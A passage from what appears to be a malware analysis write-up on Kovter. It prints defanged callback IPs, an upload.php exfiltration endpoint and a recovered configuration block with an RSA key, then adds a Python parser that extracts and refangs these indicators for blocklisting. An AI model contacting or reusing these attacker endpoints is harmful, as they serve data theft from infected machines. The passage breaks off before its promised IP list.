Seeing this, I used Strings2 to look into the regsvr.exe process for anything that might give an idea of what the callbacks would be. Piping that out to a text file, I searched for keywords like “http” (3427 hits) and “/upload.php” (17 hits). Those hits point to the following IP addresses.

185[.]117[.]72[.]90
189[.]177[.]220[.]156

The interesting thing here is the block of text found when searching for “/upload.php” in Notepad++. It contains 133 different IP addresses along with what, according to this article from PhishMe, is the configuration file for Kovter, including the download URLs it uses to patch the system to the latest versions of Flash and the .NET Framework. **Note: I came across the PhishMe link when looking up the term “nonuldnet32” in Google.

cp1::[133 defanged ip:port entries, '>'-separated, omitted]>

cp1cptm::30::cptmkey::a7887cc809cf0d4df17fc5dafd03e4e7::keypass::65537::20717578436666370206990156461786566788132748458910865354994919388630407187082788932551065567891365033974994995141358277530021944793516607142737605543772104350635734672485498640041982499636009940196953103877199811371834197299886690010229547993815721647414299018829914480336700775760032044922438942690008663278856440487164946050309668972730239620373400036156807226902415414689227139343695179004305146177952041410093920067335850237232148134221904306706694425837140102211178161590920721365317540938040383023194954613997204876850415109848188765254167924483000246775174171501733414326729845936854172715365200925796295269097::passdebug::0::debugelg::1::elgdl_sl::0::dl_slb_dll::0::b_dllnonul

http://185[.]117[.]72[.]90/upload2[.]php
nonuldnet32::http://download[.]microsoft[.]com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86[.]exe
dnet32dnet64::http://download[.]microsoft[.]com/download/9/8/6/98610406-c2b7-45a4-bdc3-9db1b1c5f7e2/NetFx20SP1_x64[.]exe
dnet64pshellxp::http://download[.]microsoft[.]com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG[.]exe
pshellxppshellvistax32::http://download[.]microsoft[.]com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6[.]0-KB968930-x86[.]msu
pshellvistax32pshellvistax64::http://download[.]microsoft[.]com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6[.]0-KB968930-x64[.]msu
pshellvistax64pshell2k3x32::http://download[.]microsoft[.]com/download/1/1/7/117FB25C-BB2D-41E1-B01E-0FEB0BC72C30/WindowsServer2003-KB968930-x86-ENG[.]exe
pshell2k3x32pshell2k3x64::http://download[.]microsoft[.]com/download/B/D/9/BD9BB1FF-6609-4B10-9334-6D0C58066AA7/WindowsServer2003-KB968930-x64-ENG[.]exe
pshell2k3x64cl_fv::24::cl_fvfl_fu::http://fpdownload[.]macromedia[.]com/get/flashplayer/current/licensing/win/install_flash_player_24_active_x[.]exe
fl_fumainanti::DD1D:1:DD1DDD2D:1:DD2DDD3D:1:DD3DDD4D:1:DD4DDD5D:0:DD5DDD6D:1:DD6DDD7D:1:DD7DDD8D:1:DD8DDD9D:1:DD9DDD10D:1:DD10DDD11D:0:DD11DDD12D:1:DD12DDD13D:1:DD13DDD14D:1:DD14DDD15D:1:DD15DDD16D:1:DD16DDD17D:0:DD17Dal:http://185[.]117[.]72[.]90/upload.php
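As an added example (not code from the write-up or from Kovter itself), here is a small parser for the tagged NAME::VALUE::NAME layout the recovered block appears to use, pulling out the cp1 callback list, the RSA public key and the URLs. The sample config, the assumption that pasted line breaks stand in for "::", and the function names are mine.

```python
import re

# Constructed sample in the layout of the block above (TEST-NET addresses, a
# toy modulus); it is not data from the capture.
SAMPLE = (
    "cp1::192.0.2.10:80>198.51.100.7:443>203.0.113.5:8080>::cp1"
    "cptm::30::cptm"
    "key::00112233445566778899aabbccddeeff::key"
    "pass::65537::3233::pass"
    "nonul\nhttp://203[.]0[.]113[.]9/upload2[.]php\nnonul"
    "dnet32::http://download[.]microsoft[.]com/NetFx20SP1_x86[.]exe::dnet32"
    "mainanti::DD1D:1:DD1DDD2D:0:DD2Dal:http://203[.]0[.]113[.]9/upload.php"
)

def parse_kovter_config(blob: str) -> dict:
    """NAME::VALUE::NAME records; each closing NAME is fused with the next opening
    NAME (e.g. '::cptmkey::'). Assumption: pasted line breaks stand in for '::'."""
    text = re.sub(r"(?:::)+", "::", re.sub(r"\s+", "::", blob.strip()))
    tokens = text.split("::")
    records, name, i = {}, tokens[0], 1
    while name and i < len(tokens):
        for j in range(i, len(tokens)):
            if tokens[j].startswith(name):  # closing tag, fused with next opener
                break
        else:                               # unterminated trailing record
            records[name] = "::".join(tokens[i:])
            break
        records[name] = "::".join(tokens[i:j])
        name, i = tokens[j][len(name):], j + 1
    return records

def refang(s: str) -> str:
    return s.replace("[.]", ".")  # undo the write-up's 'a[.]b' defanging

def c2_list(records: dict) -> list:
    """cp1 is a '>'-separated list of ip:port pairs (133 entries on the page)."""
    pairs = []
    for entry in filter(None, records.get("cp1", "").split(">")):
        host, port = refang(entry).rsplit(":", 1)
        pairs.append((host, int(port)))
    return pairs

def rsa_public_key(records: dict) -> tuple:
    """pass carries the public exponent and the decimal modulus."""
    e, n = records["pass"].split("::")
    return int(e), int(n)

def urls(records: dict) -> dict:
    """Records whose value is a URL: upload endpoints and update packages."""
    return {k: refang(v) for k, v in records.items() if v.startswith("http")}
```

Feeding it the real block gives the callback list as a plain ip:port table for blocklisting, plus the modulus size of the key Osiris-side material is wrapped with.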

And here are the IP addresses cleaned up from the list above. Please note that only a handful of the IP addresses used in the PCAPs are found in this list:

